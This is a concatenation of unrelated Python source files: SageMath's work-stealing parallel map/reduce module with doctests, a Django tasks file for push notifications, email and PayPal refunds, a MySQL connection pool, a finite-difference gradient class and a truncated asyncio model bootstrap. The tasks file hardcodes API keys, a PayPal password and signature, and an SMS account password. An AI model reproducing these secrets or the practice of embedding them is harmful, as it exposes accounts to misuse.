....: lambda l: [l+[0], l+[1]] if len(l) < 17 else [])
sage: it = iter(S)
sage: next(it) # random
[]
sage: S.abort()
sage: hasattr(S, 'work_queue')
False
Cleanups::
sage: S.finish()
"""
logger.info("Abort called")
self._aborted.value = True
self._active_tasks.abort()
self._shutdown()
def _shutdown(self):
r"""
Called to shutdown the workers
Sends a poison pill to all workers and their thief thread.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: for w in S._workers: w.start()
sage: S._shutdown()
Cleanups::
sage: S.finish()
"""
if self._done.acquire(False):
logger.debug("***************** FINISHED ******************")
logger.debug("Sending poison pills")
for worker in self._workers:
worker._request.put(AbortError)
for worker in self._workers:
worker._write_task.send(AbortError)
def _signal_task_start(self):
r"""
Signal a starting task
Used by the worker to signal that a new task is starting. As soon as
there are no more active tasks, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_start()
sage: S._active_tasks
ActiveTaskCounter(value=3)
Signaling one time too many raises an ``AbortError``::
sage: S._signal_task_done()
sage: S._signal_task_done()
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
"""
if self._active_tasks.task_start() == 0:
raise AbortError
def _signal_task_done(self):
r"""
Signal a done task
Used by the worker to signal that a task is done. As soon as
there are no more active tasks, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_done()
sage: S._active_tasks
ActiveTaskCounter(value=1)
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
Cleanups::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
# We test whether the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially set the
# semaphore to 0 to stop the computation, so this test is needed.
if self._active_tasks.task_done() <= 0:
logger.debug("raising AbortError")
self._shutdown()
raise AbortError
def random_worker(self):
r"""
Return a random worker
OUTPUT:
A worker for ``self`` chosen at random
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: EX.random_worker()
<RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
sage: EX.random_worker() in EX._workers
True
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
victim = random.randint(0, len(self._workers)-1)
return self._workers[victim]
def run(self,
max_proc=None,
reduce_locally=True,
timeout=None,
profile=None):
r"""
Run the computations
INPUT:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``reduce_locally`` -- See :class:`RESetMapReduceWorker` (default: ``True``)
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``profile`` -- directory/filename prefix for profiling, or ``None``
for no profiling (default: ``None``)
OUTPUT:
the result of the map/reduce computation; an :exc:`AbortError` is
raised if the computation was interrupted or timed out.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 8)
sage: EX.run()
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Here is an example of how to deal with a timeout::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 100)
sage: try:
....: res = EX.run(timeout=0.01)
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
self._profile = profile
self.setup_workers(max_proc, reduce_locally)
self.start_workers()
if timeout is not None:
from threading import Timer
self._timer = Timer(timeout, self.abort)
self._timer.start()
self.result = self.get_results(timeout=timeout)
if timeout is not None:
self._timer.cancel()
logger.info("Returning")
self.finish()
if self._aborted.value:
raise AbortError
else:
return self.result
def _get_stats(self):
r"""
Gather the communication statistics at the end of a run
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run() # indirect doctest
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
res = []
for i in range(self._nprocess):
res.append(tuple(self._workers[i]._stats))
self._stats = res
def print_communication_statistics(self, blocksize=16):
r"""
Print the communication statistics in a nice way
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
sage: S.print_communication_statistics() # random
#proc: 0 1 2 3 4 5 6 7
reqs sent: 5 2 3 11 21 19 1 0
reqs rcvs: 10 10 9 5 1 11 9 2
- thefs: 1 0 0 0 0 0 0 0
+ thefs: 0 0 1 0 0 0 0 0
"""
res = [""] # classical trick to have a local variable shared with the
# local function (see e.g:
# http://stackoverflow.com/questions/2609518/python-nested-function-scopes).
def pstat(name, start, end, ist):
res[0] += "\n" + name
res[0] += " ".join(
"%4i"%(self._stats[i][ist]) for i in range(start, end))
for start in range(0, self._nprocess, blocksize):
end = min(start+blocksize, self._nprocess)
res[0] = "#proc: "+" ".join("%4i"%(i) for i in range(start, end))
pstat("reqs sent: ", start, end, 0)
pstat("reqs rcvs: ", start, end, 1)
pstat("- thefs: ", start, end, 2)
pstat("+ thefs: ", start, end, 3)
print(res[0])
def run_serial(self):
r"""
Serial run of the computation (mostly for tests)
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 4)
sage: EX.run_serial()
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
import functools
return functools.reduce(self.reduce_function,
(self.map_function(x) for x in self._forest),
self.reduce_init())
class RESetMapReduceWorker(Process):
"""
Worker for generate-map-reduce
This should not be instantiated directly; instances are created by
:meth:`RESetMapReduce.setup_workers`.
INPUT:
- ``mapred`` -- the instance of :class:`RESetMapReduce` for which
this process is working.
- ``iproc`` -- the id of this worker.
- ``reduce_locally`` -- how to reduce the results. Two possible values
are supported:
* ``True`` -- the reducing work is done entirely locally; the result is
only sent back at the end of the work. This ensures the lowest level of
communication.
* ``False`` -- results are sent back after each finished branch, when
the process is asking for more work.
"""
def __init__(self, mapred, iproc, reduce_locally):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample()
sage: RESetMapReduceWorker(EX, 200, True)
<RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
"""
Process.__init__(self)
self._iproc = iproc
self._todo = collections.deque()
self._request = SimpleQueue() # Faster than Queue
# Currently it is not possible to have two simultaneous reads or writes
# on the following Pipe, so there is no need for a queue.
self._read_task, self._write_task = Pipe(duplex=False)
self._mapred = mapred
self._stats = RawArray('i', 4)
self._reduce_locally = reduce_locally
def _thief(self):
r"""
The thief thread of a worker process
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: w0, w1 = EX._workers
sage: w0._todo.append(42)
sage: thief0 = Thread(target = w0._thief, name="Thief")
sage: thief0.start()
sage: w1.steal()
42
sage: w0._todo
deque([])
"""
logger.debug("Thief started")
reqs = 0
thefts = 0
try:
for ireq in iter(self._request.get, AbortError):
reqs += 1
target = self._mapred._workers[ireq]
logger.debug("Got a Steal request from %s"%target.name)
self._mapred._signal_task_start()
try:
work = self._todo.popleft()
except IndexError:
target._write_task.send(None)
logger.debug("Failed Steal %s"%target.name)
self._mapred._signal_task_done()
else:
target._write_task.send(work)
logger.debug("Succesful Steal %s"%target.name)
thefts += 1
except AbortError:
logger.debug("Thief aborted")
else:
logger.debug("Thief received poison pill")
if self._mapred._aborted.value: # Computation was aborted
self._todo.clear()
else: # Check that there is no remaining work
assert len(self._todo) == 0, "Bad stop: the result may be wrong"
self._stats[1] = reqs
self._stats[2] = thefts
logger.debug("Thief Exiting")
def steal(self):
r"""
Steal some node from another worker.
OUTPUT:
a node stolen from another worker chosen at random
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: w0, w1 = EX._workers
sage: w0._todo.append(42)
sage: thief0 = Thread(target = w0._thief, name="Thief")
sage: thief0.start()
sage: w1.steal()
42
"""
self._mapred._signal_task_done()
node = None
while node is None:
victim = self._mapred.random_worker()
if victim is not self:
logger.debug("Trying to steal from %s"%(victim.name))
victim._request.put(self._iproc)
self._stats[0] += 1
logger.debug("waiting from steal answer from %s"%(victim.name))
node = self._read_task.recv()
# logger.debug("Request answer: %s"%(node,))
if node is AbortError:
raise AbortError
# logger.debug("Received a stolen node: %s"%(node,))
self._stats[3] += 1
return node
def run(self):
r"""
The main function executed by the worker
Calls :meth:`run_myself` after possibly setting up parallel profiling.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run()
sage: sleep(1)
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
profile = self._mapred._profile
if profile is not None:
from multiprocessing import current_process
import cProfile
PROFILER = cProfile.Profile()
PROFILER.runcall(self.run_myself)
output = profile + str(self._iproc)
logger.warning("Profiling in %s ..."%output)
PROFILER.dump_stats(output)
else:
self.run_myself()
def run_myself(self):
r"""
The main function executed by the worker
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run_myself()
sage: sleep(1)
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
logger.debug("Started")
mapred = self._mapred
reduce_init = mapred.reduce_init
results = mapred._results
self._stats[0] = 0
self._stats[3] = 0
logger.debug("Launching thief")
# Note: this rebinds ``self._thief`` from the bound method to the Thread.
self._thief = Thread(target=self._thief, name="Thief")
self._thief.start()
self._res = reduce_init()
try:
while True:
try:
node = self._todo.pop()
except IndexError:
node = self.steal()
self.walk_branch_locally(node)
if not self._reduce_locally:
self.send_partial_result()
except AbortError:
logger.debug("Worker Done !")
results.put(self._res)
results.put(None)
self._thief.join()
del self._request
self._read_task.close()
self._write_task.close()
del self._read_task, self._write_task
del self._mapred
del self._stats
logger.debug("Exiting")
def send_partial_result(self):
r"""
Send results to the MapReduce process
Send the result stored in ``self._res`` to the master and reinitialize
it to ``master.reduce_init()``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._res = 4
sage: w.send_partial_result()
sage: w._res
0
sage: EX._results.get()
4
"""
self._mapred._results.put(self._res)
self._res = self._mapred.reduce_init()
def walk_branch_locally(self, node):
r"""
Work locally
Perform the map/reduce computation on the subtree rooted at ``node``.
INPUT:
- ``node`` -- the root of the subtree explored.
OUTPUT:
nothing; the results are stored in ``self._res``.
This is where the actual work is performed.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: w = RESetMapReduceWorker(EX, 0, True)
sage: def sync(): pass
sage: w.synchronize = sync
sage: w._res = 0
sage: w.walk_branch_locally([])
sage: w._res
x^4 + x^3 + x^2 + x + 1
sage: w.walk_branch_locally(w._todo.pop())
sage: w._res
2*x^4 + x^3 + x^2 + x + 1
sage: while True: w.walk_branch_locally(w._todo.pop())
Traceback (most recent call last):
...
IndexError: pop from an empty deque
sage: w._res
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
mapred = self._mapred
children = mapred.children
post_process = mapred.post_process
fun = mapred.map_function
reduc = mapred.reduce_function
# logger.debug("Working on %s..."%(node,))
while True:
res = post_process(node)
if res is not None:
self._res = reduc(self._res, fun(res))
newnodes = iter(children(node))
try:
node = next(newnodes)
except StopIteration:
return
self._todo.extend(newnodes)
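# A minimal pure-Python sketch of the depth-first strategy implemented by
# walk_branch_locally above: follow one child immediately and push the
# remaining siblings onto the local deque, where they stay available for
# thieves. ``children``, ``fun`` and ``reduc`` are stand-ins for the
# map/reduce hooks; ``post_process`` is omitted for brevity.
def _example_walk(node, children, fun, reduc, res, todo):
    while True:
        res = reduc(res, fun(node))
        newnodes = iter(children(node))
        try:
            node = next(newnodes)
        except StopIteration:
            return res
        todo.extend(newnodes)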
class RESetMPExample(RESetMapReduce):
r"""
An example of a map/reduce class
INPUT:
- ``maxl`` -- the maximum size of the permutations generated (default: `9`).
This computes the generating series of permutations counted by their
size, up to size ``maxl``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: EX.run()
362880*x^9 + 40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
.. SEEALSO:: This is an example of :class:`RESetMapReduce`
"""
def __init__(self, maxl = 9):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample()
<sage.parallel.map_reduce.RESetMPExample object at 0x...>
"""
RESetMapReduce.__init__(self)
from sage.rings.polynomial.polynomial_ring import polygen
from sage.rings.integer_ring import ZZ
self.x = polygen(ZZ, 'x')
self.maxl = maxl
def roots(self):
r"""
Return the empty permutation
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().roots()
[[]]
"""
return [[]]
def children(self, l):
r"""
Return the children of the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
the list of lists obtained by inserting ``len(l)`` at all possible positions in ``l``
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().children([1,0])
[[2, 1, 0], [1, 2, 0], [1, 0, 2]]
"""
return [ l[:i] + [len(l)] + l[i:]
for i in range(len(l)+1) ] if len(l) < self.maxl else []
def map_function(self, l):
r"""
The monomial associated to the permutation `l`
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
``x^len(l)``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().map_function([1,0])
x^2
"""
return self.x**len(l)
class RESetParallelIterator(RESetMapReduce):
r"""
A parallel iterator for recursively enumerated sets
This demonstrates how to use :class:`RESetMapReduce` to get an iterator
over a recursively enumerated set for which the computations are done
in parallel.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 15 else [])
sage: sum(1 for _ in S)
65535
"""
def map_function(self, z):
r"""
Return a singleton tuple
INPUT: ``z`` -- a node
OUTPUT: ``(z, )``
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 15 else [])
sage: S.map_function([1, 0])
([1, 0],)
"""
return (z,)
reduce_init = tuple  # partial results start as the empty tuple
def __iter__(self):
r"""
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 15 else [])
sage: it = iter(S)
sage: next(it) # random
[1, 1, 0]
sage: next(it) # random
[1, 1, 0, 1]
sage: sum(1 for _ in it)
65533
"""
self.setup_workers(reduce_locally=False)
self.start_workers()
active_proc = self._nprocess
while True:
newres = self._results.get()
if newres is not None:
logger.debug("Got some results")
for r in newres:
yield r
else:
active_proc -= 1
if active_proc == 0:
break
self.finish()
|
tasks.py
|
import json, os, requests
# from email.MIMEImage import MIMEImage
from django.conf import settings
from django.core import mail
# from mailin import Mailin
import base64
from pprint import pprint
def send_pushnotifs(channels, message, auto_increment=True):
print ('>>> task send_pushnotifs running with channels "{}" and message "{}"'.format(channels, message))
from onedollar.models import OneDollarUserToken
url = "https://fcm.googleapis.com/fcm/send"
tokens = list(OneDollarUserToken.get_tokens_of_users(channels))
data = dict(message)  # copy of the payload, sent as the FCM "data" field
# ``message`` itself (with title and click_action added) is sent as the
# FCM "notification" field.
message['title'] = 'One Dollar'
message['click_action'] = 'ACTION_CLICK_NOTIFY'
push_data = json.dumps({
"registration_ids": tokens,
"notification": message,
"data": data,
})
headers = {
'content-type': "application/json",
'authorization': "key=AIzaSyC_wnchqs8pio0IeWDqoGcI1v6zLONFais",
'project_id': "26835176988",
}
response = requests.request("POST", url, data=push_data, headers=headers)
return response
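# A minimal sketch of the intended call (assumed usage): the channel ids and
# message body below are hypothetical.
def _example_send_pushnotifs():
    # send_pushnotifs itself adds 'title' and 'click_action' before
    # dispatching to FCM.
    return send_pushnotifs(channels=[1, 2], message={'body': 'You won this round!'})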
# def send_pushnotifs1(channels, message, auto_increment=True):
# print ('>>> task send_pushnotifs running with channels "{}" and message "{}"'.format(channels, message))
# connection = httplib.HTTPSConnection('api.parse.com', 443)
# connection.connect()
# try:
# message.setdefault("action", "com.nng.onedollar")
# if auto_increment:
# message.setdefault("badge", "Increment")
# except:
# pass
# push_data = json.dumps({
# "channels": list(channels),
# "data": message,
# })
# connection.request('POST', '/1/push', push_data, {
# "X-Parse-Application-Id": settings.PARSE_APPLICATION_ID,
# "X-Parse-REST-API-Key": settings.PARSE_REST_API_KEY,
# "Content-Type": "application/json"
# })
# result = json.loads(connection.getresponse().read())
# if result and result['result']:
# return result.get('result', False)
# return False
from threading import Thread
def send_async_email(msg):
print (msg.send())
# with app.app_context():
# print (msg.send())
# mail.send(msg)
def send_email(subject, html_content, emails, from_email=None):
if from_email is None:
from_email = settings.EMAIL_FROM
msg = mail.EmailMultiAlternatives(subject, html_content, from_email, emails)
msg.content_subtype = "html" # Main content is now text/html
msg.mixed_subtype = 'related'
# fp = open(os.path.join(settings.BASE_DIR, 'emailheader.png'))
# msg_img = MIMEImage(fp.read())
# fp.close()
# msg_img.add_header('Content-ID', '<emailheader.png>')
# msg.attach(msg_img)
thr = Thread(target=send_async_email, args=[msg])
thr.start()
# print (msg.send())
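# A minimal sketch (assumed usage): the recipient and subject below are
# placeholders. The message is sent asynchronously on a background thread.
def _example_send_email():
    send_email(
        subject='Welcome',
        html_content='<h1>Hello!</h1>',
        emails=['user@example.com'],  # hypothetical recipient
    )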
# def send_email_sendingblue(subject, html_content, emails, from_email=None):
# m = Mailin("https://api.sendinblue.com/v2.0","yA3MRfQW9wv0jTZp")
# with open(os.path.join(settings.BASE_DIR, 'emailheader.png'),"rb") as image_file:
# data = image_file.read()
# encoded_string = base64.encodestring(data)
# data = { "to" : {"ngochoang09121996@gmail.com":"to whom!"},
# "from" : [settings.EMAIL_FROM],
# "subject" : subject,
# "html" : html_content,
# "headers" : {"Content-Type": "text/html;charset=iso-8859-1","X-param1": "value1", "X-param2": "value2","X-Mailin-custom":"my custom value", "X-Mailin-IP": "102.102.1.2", "X-Mailin-Tag" : "My tag"},
# "inline_image" : {"emailheader.png" : encoded_string }
# }
# result = m.send_email(data)
# print(result)
# def send_sms(phone,code):
# connection = httplib.HTTPSConnection('api.smsapi.com', 443)
# connection.connect()
# url = '/sms.do?username=gpanot@giinger.com&password=ceac99e637c6ecb1e64740355e65f416&encoding=utf-8&to=%s&message=%s' %(phone,code)
# connection.request('GET', url)
# result = connection.getresponse().read()
# return True
def refund_paypal(transaction_id):
url = "https://api-3t.sandbox.paypal.com/nvp"
push_data = {
"USER": 'hhh+merchant_api1.nng.bz',
"PWD": 'Q8D42RQ4983CQK8P',
"SIGNATURE": 'AFcWxV21C7fd0v3bYYYRCpSSRl31AurlRYgTvul7Pvoq-MLEnIAuAkdq',
"METHOD": 'RefundTransaction',
"VERSION": 94,
"TRANSACTIONID": transaction_id,
"REFUNDTYPE" : 'Full'
}
headers = {}
response = requests.request("POST", url, data=push_data, headers=headers)
print (response)
from twitter import api
def twitter(html=None):
coca = api.Api(consumer_key=settings.CONSUMER_KEY,
consumer_secret=settings.CONSUMER_SECRET,
access_token_key=settings.ACCESS_TOKEN,
access_token_secret=settings.ACCESS_TOKEN_SECRET)
return coca.GetSearch(
raw_query="q=%23HiEfficiencyBar&result_type=recent&count=5")
|
connection.py
|
import time
import collections
import threading
from .session import *
class Connection(object):
def __init__(self, host, user, password, database, name, port=3306, connections=1, init_thread=True, autocommit=True):
self.__connection_pool = collections.defaultdict(list)
self.__default_pool = name
self.add_multiple_connections(host, user, password, database, name, port, connections, autocommit)
self.__thread = threading.Thread(target=self.thread_reconnect)
if init_thread:
self.__thread.start()
def execute(self, query, name_pool=None, fetch_all=True):
if name_pool is None:
name_pool = self.__default_pool
response = ''
try:
for conn in self.__connection_pool[name_pool]:
if conn.connected:
res = conn.query(query, fetch_all)
if res is None and conn.connected is False:
continue
response = res
break
return response
except Exception as e:
print(str(e))
return None
def get_conn(self, name_pool=None):
if name_pool is None:
name_pool = self.__default_pool
return self.__connection_pool[name_pool][0].get_connection()
def thread_reconnect(self):
while True:
for key in self.__connection_pool.keys():
for conn in self.__connection_pool[key]:
if conn.connected is False:
conn.reconnect()
time.sleep(30)
def set_default_name_pool(self, name):
self.__default_pool = name
def add_new_connection(self, host, user, password, database, name, port, autocommit):
self.__connection_pool[name].append(Session(host, user, password, database, port, autocommit=autocommit))
def add_multiple_connections(self, host, user, password, database, name, port, connections, autocommit):
for _ in range(connections):
self.add_new_connection(host, user, password, database, name, port, autocommit)
def close_pool(self, name=None):
if name is None:
name = self.__default_pool
for con in self.__connection_pool[name]:
con.close()
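# A minimal sketch (assumed usage): host, credentials and query below are
# placeholders. ``connections`` sizes the pool; ``execute`` tries each
# connection in the named pool until one that is connected answers.
# ``init_thread=False`` keeps the background reconnect loop from starting
# in this short-lived example.
def _example_connection_pool():
    conn = Connection('127.0.0.1', 'user', 'secret', 'mydb',
                      name='main', connections=2, init_thread=False)
    rows = conn.execute('SELECT 1', name_pool='main')
    conn.close_pool('main')
    return rows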
|
FDGradient.py
|
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
# -*-mode: python; py-indent-offset: 4; tab-width: 8; coding: iso-8859-1 -*-
import numpy as np
from copy import deepcopy
from .FDSecondOrderCentered import FDSecondOrderCentered
from .FDFirstOrderUpwind import FDFirstOrderUpwind, FDFirstOrderUpwindComplexStep
import multiprocessing
class FDGradient(object):
"""
Finite differences gradient.
Computes the gradient by finite differences for a given scheme order.
"""
def __init__(self, scheme_order, f_pointer, df_pointer=None, fd_step=1.e-8, bounds=None):
"""
Constructor.
Args :
scheme_order : the order of the numerical scheme (1, 1j for the
complex step, or 2 for second-order centered differences).
f_pointer : the pointer to the function on which
finite differences are computed.
df_pointer : optional pointer to the gradient of the function,
required for Hessian computations.
fd_step : the finite-difference step.
bounds : optional bounds on the variables, forwarded to the scheme.
"""
self.__scheme_order = scheme_order
self.fd_step = fd_step
if scheme_order == 1:
self.__scheme = FDFirstOrderUpwind(fd_step, bounds)
elif scheme_order == 1j:
self.__scheme = FDFirstOrderUpwindComplexStep(fd_step, bounds)
elif scheme_order == 2:
self.__scheme = FDSecondOrderCentered(fd_step, bounds)
else:
raise Exception(
"Scheme of order" +
str(scheme_order) +
" not available now.")
self.__fpointer = f_pointer
self.__dfpointer = df_pointer
self.multi_proc = False
def set_bounds(self, bounds):
self.__scheme.set_bounds(bounds)
def set_multi_proc(self, multi):
self.multi_proc = multi
def get_scheme(self):
"""
Accessor for the scheme.
Returns :
The numerical scheme
"""
return self.__scheme
def __worker(self, index, x_in, return_dict):
out = self.__fpointer(x_in)
return_dict[index] = out
def grad_f(self, x, args=None):
"""
Gradient calculation. Calls the numerical scheme.
Args:
x : the variables at which gradient is computed.
"""
#print('grad_f call')
self.__scheme.set_x(x)
self.__scheme.generate_samples()
samples = self.__scheme.get_samples()
n_samples = len(samples)
if self.multi_proc:
n_procs = multiprocessing.cpu_count()
print('FDGradient: multi-process grad_f, parallel run on ',
n_procs, ' procs.')
manager = multiprocessing.Manager()
return_dict = manager.dict()
n = 0
while n < n_samples:
if n + n_procs < n_samples:
n_subs = n_procs
else:
n_subs = n_samples - n
jobs = []
for i in range(n_subs):
index = n + i
x_in = samples[index]
p = multiprocessing.Process(
target=self.__worker, args=(index, x_in, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
n += n_subs
y = []
for i in range(n_samples):
y.append(return_dict[i])
else:
y = []
for x in samples:
#print('x =',x)
if args is None:
y.append(deepcopy(self.__fpointer(x)))
else:
y.append(deepcopy(self.__fpointer(x, *args)))
grad_index = len(y)
#print('grad index = ',grad_index)
s = np.shape(y[0])
if len(s) < 2:
y_array = np.array(y)
elif len(s) == 2:
p = len(y)
if self.get_scheme().order == 1j:
y_array = np.zeros((s[0], s[1], p), dtype=np.complex128)
else:
y_array = np.zeros((s[0], s[1], p))
for i in range(p):
y_array[:, :, i] = y[i]
else:
raise Exception(
"Functional outputs of dimension >2 are not yet handled.")
return self.__scheme.compute_grad(y_array)
def hess_f(self, x):
"""
Hessian computation by finite differences, based on the numerical scheme
provided at construction.
Args:
x : the variables at which the Hessian is computed.
"""
if self.__dfpointer is None:
raise Exception(
"Gradient is required to compute finite differences Hessian.")
self.__scheme.set_x(x)
self.__scheme.generate_samples()
dy_array = np.zeros((len(self.__scheme.get_samples()), len(x)))
for i, x in enumerate(self.__scheme.get_samples()):
dy_array[i, :] = self.__dfpointer(x)
return self.__scheme.compute_hessian(dy_array)
def vect_hess_f(self, x, nb_func):
"""
Vectorized Hessian computation.
Args:
x : the variables at which the Hessian is computed.
nb_func : the number of functions whose Hessians are computed.
"""
if self.__dfpointer is None:
raise Exception(
"Gradient is required to compute finite differences Hessian.")
self.__scheme.set_x(x)
self.__scheme.generate_samples()
dy_array_list = np.zeros(
(nb_func, len(self.__scheme.get_samples()), len(x)))
for i, x in enumerate(self.__scheme.get_samples()):
dy_array_list[:, i, :] = self.__dfpointer(x)
H_list = []
for f in range(nb_func):
H_list.append(self.__scheme.compute_hessian(
dy_array_list[f, :, :]))
return H_list
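# A minimal sketch (assumed usage): approximate the gradient of
# f(x) = x0**2 + 3*x1 with the second-order centered scheme. The exact
# gradient at (1, 2) is (2, 3).
def _example_fd_gradient():
    def f(x):
        return x[0] ** 2 + 3.0 * x[1]

    fd = FDGradient(2, f, fd_step=1.e-6)
    return fd.grad_f(np.array([1.0, 2.0]))  # approximately array([2., 3.])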
|
ModelBootstrap.py
|
import copy
import logging
import asyncio
import threading
import sys
import queue
from concurrent.futures import ThreadPoolExecutor
#fly
from .ModelIO import ModelIO
from .ModelConfig import ModelConfig
from pprint import pprint
from .ModelManager import ModelManager
from . import ModelCreate
from . import logSetup
class ModelBootstrap(object):
def __init__(self,*args,**kwargs):
# Setup log configurations
logSetup.logSetup(*args,**kwargs)
self.logger = logging.getLogger(__name__)
self._loop = asyncio.get_event_loop()
self._ModelConfig = ModelConfig(kwargs.get('filename'))
self._modelNames = self._ModelConfig.getModels()
self._ModelCreate = ModelCreate.ModelCreate(*args,**kwargs)
self._modelInit = threading.Event()
self.createModels(*args,**kwargs)
self._ModelManager = ModelManager()
self.createConnections(*args,**kwargs)
self.startModels(*args,**kwargs)
def createTasks(self,model=None,executors=1,params=None,loop=None,*args,**kwargs):
tasks=[]
for i in range(executors):
for func in [self.producer, self.consumer]:
tasks.append(asyncio.ensure_future(func(*params,loop=loop),loop=loop))
if model.getModelType() == 'generator':
break
return tasks
def startThread(self,tasks,loop):
asyncio.set_event_loop(loop)
# Note: the explicit ``loop=`` arguments assume Python < 3.10, where
# asyncio.gather/ensure_future still accept them.
loop.run_until_complete(asyncio.gather(*tasks, loop=loop))
def startModels(self,*args,**kwargs):
for modelName,model in self._ModelManager.getModels().items():
tasks=[]
loop = asyncio.new_event_loop()
baseParams = [model, model.getQOut(), model.getQErr(),
model.getQOnSuccess(), model.getQOnFailure()]
if model.getInputPorts() == 'any':
for q in model.getQIn():
resultQ = queue.Queue()
params = baseParams + [[q],resultQ]
